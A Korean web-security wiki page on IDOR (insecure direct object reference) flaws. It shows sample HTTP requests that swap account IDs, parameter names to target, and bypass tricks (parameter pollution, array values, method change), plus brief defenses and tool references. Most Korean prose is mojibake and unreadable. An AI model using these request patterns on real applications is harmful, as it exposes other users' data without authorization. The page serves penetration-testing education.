π Introduction
IDOR(Insecure Direct Object References)λ Access Controlμμ λ°μνλ μ·¨μ½μ μ€ μΈλΆμ λ ΈμΆλκ±°λ μ 곡λλ μ λ ₯μ΄ Objectμ μ§μ μ°Έκ³ νκ³ μμΈμ€ν λ μ΄λ₯Ό μ΄μ©νμ¬ λ³ΈμΈμ κΆνμ λμ΄μλ μ‘μ μ μνν μ μμ΅λλ€.
Origin Request
GET /info?accountId=15442
IDOR Request
GET /info?accountId=1110
μΌλ°μ μΌλ‘ Horizontal privilege escalation μ¦, μνμ μΌλ‘ κΆνμ μ μ©ν μ μμ§λ§ λλλ‘ μ΄ν리μΌμ΄μ ꡬμ±μ΄λ μ μ± μ λ°λΌμ Vertical privilege escalation(μμ§μ κΆν μμΉ)μΌλ‘ μ°κ²°λ μ μμ΅λλ€.
π‘ Offensive techniques
Detect
μ΄ν리μΌμ΄μ μ²λ¦¬ λ‘μ§μμ μ¬μ©μ μ λ ₯ κ°μ΄ Objectμ μ§μ μ°Έμ‘°λλ λΆλΆλ€μ΄ λͺ¨λ μν₯ λ°μ΅λλ€. μΌλ°μ μΌλ‘ ID, Username λ± μλ³ κ°μ΄ ν¬μΈνΈκ° λλ©°, νλΌλ―Έν°κ° μλ Static File λ±μμλ μλ³ μ 보λ₯Ό κΈ°λ°μΌλ‘ν λ°μ΄ν° μ°Έμ‘°κ° μλ κ²½μ° IDORμ μν₯μ λ°μ μ μμ΅λλ€.
Origin Request
POST /save_profile HTTP/1.1
account=15442&name=aaa
IDOR Request
POST /save_profile HTTP/1.1
account=1110&name=aaa
μ μμμμ accountμ κ°μ΄ μ¬μ©μμ Objectμ μ°Έμ‘°λ λ§ν νλΌλ―Έν°μ λ€λ₯Έ μ¬μ©μμ κ°μ λ£μ΄ μ΄ν리μΌμ΄μ μ μ²λ¦¬, 리ν΄λλ λ°μμ μ΄νλλ€. λ§μ½ account κ°μ 1110μ μ¬μ©νλ μ μ μ λ°μ΄ν°κ° λ³κ²½λμλ€λ©΄ IDORμ μ·¨μ½ν κ²μΌλ‘ νλ¨ν©λλ€.
With HUNT
ZAP, Burpsuiteμμ HUNTλΌλ AddOnμ ν΅ν΄ IDORμ κ°λ₯μ±μ κ°μ§λ Requestλ₯Ό Passive Scan ννλ‘ μλ³ν μ μμ΅λλ€. μμΈν λ΄μ©μ μλ κΈμ μ°Έκ³ ν΄μ£ΌμΈμ.
- https://www.hahwul.com/2022/04/12/zap-hunt-remix/
- https://www.hahwul.com/2018/04/18/bugcrowd-hunt-burp-extension/
With GF-Patterns
GF-Patternsμ λͺ μλ λνμ μΈ νλΌλ―Έν° μ΄λ¦μ μλμ κ°μ΅λλ€. μ΄λ° νλΌλ―Έν°λ€μ IDORμ μ£Όμ νμ μ΄ λ©λλ€.
{
[
"id=",
"user=",
"account=",
"number=",
"order=",
"no=",
"doc=",
"key=",
"email=",
"group=",
"profile=",
"edit=",
"report="
]
}
Exploitation
Horizontal privilege escalation
μν κΆν μμΉμ IDORλ₯Ό ν΅ν΄ μ μ¬ν κΆνμ κ°μ§ λ€λ₯Έ μ¬μ©μμ λ°μ΄ν°λ₯Ό μ²λ¦¬νλ ννμ λ°©λ²μ λλ€.
Origin Request
POST /save_profile HTTP/1.1
account=15442&name=aaa
IDOR Request
POST /save_profile HTTP/1.1
account=1110&name=aaa
Vertical privilege escalation
μμ§ κΆν μμΉμ IDORλ₯Ό ν΅ν΄ μμ κΆνμ κ°μ§ λ€λ₯Έ μ¬μ©μμ λ°μ΄ν°λ₯Ό μ²λ¦¬νλ ννμ λ°©λ²μ λλ€. λ³΄ν΅ μΌλ° κ³μ κ°μ κΆν λ¬Έμ κ° μλ Admin λ± μμ κΆνμ λ°μ΄ν°λ₯Ό μΉ¨λ²νλ ννμ λ°©λ²μ λλ€.
Origin Request
POST /save_profile HTTP/1.1
account=15442&name=aaa
IDOR Request
POST /save_profile HTTP/1.1
admin_account=1&name=aaa
Bypass protection
HPP
IDORλ HPP(Http Parameter Pollution)μ ν΅ν΄ μ°νν μ μλ κ²½μ°κ° μ’ μ’ μμ΅λλ€.
Bypass Request
POST /save_profile HTTP/1.1
account=15442&account=1110&name=aaa
Bypass Request (Array)
POST /save_profile HTTP/1.1
account[]=15442&account[]=1110&name=aaa
JSON Array
Origin Request
POST /save_profile HTTP/1.1
{
"account":"15442"
}
Origin Request
POST /save_profile HTTP/1.1
{
"account":[
"15442",
"1110"
]
}
Change Method
Bypass Request
PUT /save_profile HTTP/1.1
account=1110&name=aaa
π‘ Defensive techniques
λμ λ°©μμ κ°λ¨ν©λλ€. μ¬μ©μμ μ λ ₯μ μ λ’°νμ§ μκ³ μΈμ , μΏ ν€ λ± μΈμ¦ μ 보μ λΉκ΅νμ¬ κΆνμ μ ννκ² κ²μ¦ν΄μΌ ν©λλ€.
λν μΈμ¦ μ 보λ₯Ό κ²μ¦ν μ μλ API λ±μ κ²½μ° μ¬μ©μκ° μ§μ λ°μ΄ν°λ₯Ό ν΅μ ν μ μλλ‘ λ²‘μλ λ€μ MSA ννλ‘ μ¨κΈ°λκ° μμ λ³λμ Interfaceλ₯Ό ꡬννμ¬ λμν μλ μμ΅λλ€.
πΉ Tools
- ZAP
- Access Control Testing AddOn
- Scripting & Zest
- Burpsuite
- Authz
- AuthMatrix
- Authorize
- Authz0
- apidor
- ozauthmatrix
π Articles
- https://www.hahwul.com/2022/04/12/zap-hunt-remix/
π References
- https://portswigger.net/web-security/access-control/idor
- https://github.com/1ndianl33t/Gf-Patterns/blob/master/idor.json
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References
- https://wiki.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)
- https://book.hacktricks.xyz/pentesting-web/idor